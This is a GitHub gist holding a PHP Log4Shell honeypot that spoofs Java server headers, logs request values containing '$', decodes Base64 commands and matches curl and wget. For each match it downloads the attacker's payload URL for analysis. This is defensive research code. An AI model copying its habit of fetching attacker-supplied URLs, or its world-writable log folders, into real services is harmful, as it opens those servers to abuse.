Skip to content

Instantly share code, notes, and snippets.

@ltoinel
Created December 20, 2021 23:16
Show Gist options
  • Save ltoinel/5ae5de317c599828f6b9aa7ad2841b02 to your computer and use it in GitHub Desktop.
Save ltoinel/5ae5de317c599828f6b9aa7ad2841b02 to your computer and use it in GitHub Desktop.
A Simple Log4Shell HoneyPot
<?php
# Fake Java HTTP server headers
header("Server: WildFly/8",true);
header("X-Powered-By: Undertow/1",true);
/**
* A Simple Attack logger
*/
function log_attack($log_msg)
{
$log_filename = "data/" . date('Y-m-d');
if (!file_exists($log_filename)) {
// create directory/folder uploads.
mkdir($log_filename, 0777, true);
}
$log_file_data = $log_filename . '/' . $_SERVER['REMOTE_ADDR'] . '.txt';
// write the content
file_put_contents($log_file_data, $log_msg . "\n", FILE_APPEND);
}
// We merge the SERVER and REQUEST arrays into one.
$data = array_merge($_SERVER, $_REQUEST);
$attack = false;
// We try to find a dollar in the different values that can be a proof of log4shell attack.
foreach ( $data as $key => $value) {
// We found a dollar in a HTTP header or Request.
if (strpos($value, '$') !== FALSE) {
$attack = true;
log_attack($_SERVER['REMOTE_ADDR'] . ":" . $key . ":" . print_r($value,true));
// Check for Basic64 Command.
$pointer = strpos($value, "Base64");
// The JNDI contains a Basic64 command.
if ($pointer !== FALSE){
// We extract the base64 encoded command.
$basic64 = substr($value, $pointer + 7, -1);
// We decode the shell command and log it.
$command = base64_decode($basic64);
log_attack($_SERVER['REMOTE_ADDR'] . ":" . $command);
// We split the shekll command into unique instructions for analysis.
$command = str_replace(array("(",")"), "", $command);
$command = str_replace(array("||"), "|", $command);
$instructions = explode('|',$command);
// We check each instruction to detect if it's a curl or wget command.
foreach($instructions as $instruction){
// If it's a curl or wget command.
if (strpos($instruction,"curl") !== FALSE || strpos($instruction,"wget") !== FALSE){
// We extract all args of the shell instruction.
$args = explode(" ", $instruction);
$url = end($args);
// Create curl resource.
$ch = curl_init();
// Set tyarget url.
curl_setopt($ch, CURLOPT_URL, $url);
// Return the transfer as a string.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Download the infected payload from the hacker server.
$script = curl_exec($ch);
// We save it for analysis.
log_attack("PAYLOAD:$url=" . $script);
// close curl resource to free up system resources.
curl_close($ch);
}
}
}
}
}
?>
<html>
<head>
<title>Welcome</title>
</head>
<body>
<pre>
<?php
if ($attack){
?>
________________
____/ ( ( ) ) \___
/( ( ( ) _ )) ) )\
(( ( )( ) ) ( ) )
((/ ( _( ) ( _) ) ( () ) )
( ( ( (_) (( ( ) .((_ ) . )_
( ( ) ( ( ) ) ) . ) ( )
( ( ( ( ) ( _ ( _) ). ) . ) ) ( )
( ( ( ) ( ) ( )) ) _)( ) ) )
( ( ( \ ) ( (_ ( ) ( ) ) ) ) )) ( )
( ( ( ( (_ ( ) ( _ ) ) ( ) ) )
( ( ( ( ( ) (_ ) ) ) _) ) _( ( )
(( ( )( ( _ ) _) _(_ ( (_ )
(_((__(_(__(( ( ( | ) ) ) )_))__))_)___)
((__) \\||lll|l||/// \_))
( /(/ ( ) ) )\ )
( ( ( ( | | ) ) )\ )
( /(| / ( )) ) ) )) )
( ( ((((_(|)_))))) )
( ||\(|(|)|/|| )
( |(||(||)|||| )
( //|/l|||)|\\ \ )
(/ / // /|//||||\\ \ \ \ _)
<?php
} else {
?>
:::: :::::: :::: :::: :::::::::
:::: :::: :::: :::: :::: :::::::::
:::: :::: :::: :::: :::: ::::
:::: :::: :::: :::: :::: ::::::::
:::: :::: :::: :::: :::: ::::
:::: :::: :::: :::::::: ::::
:::::::::: :::: :::: :::::: :::::::::
:::::::::: :::::: :::: :::::::::
<?php
}
?>
</pre>
</body>
</html>
@Boydidy
Copy link

Boydidy commented May 3, 2022

Trop Cool ton honeyPot

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment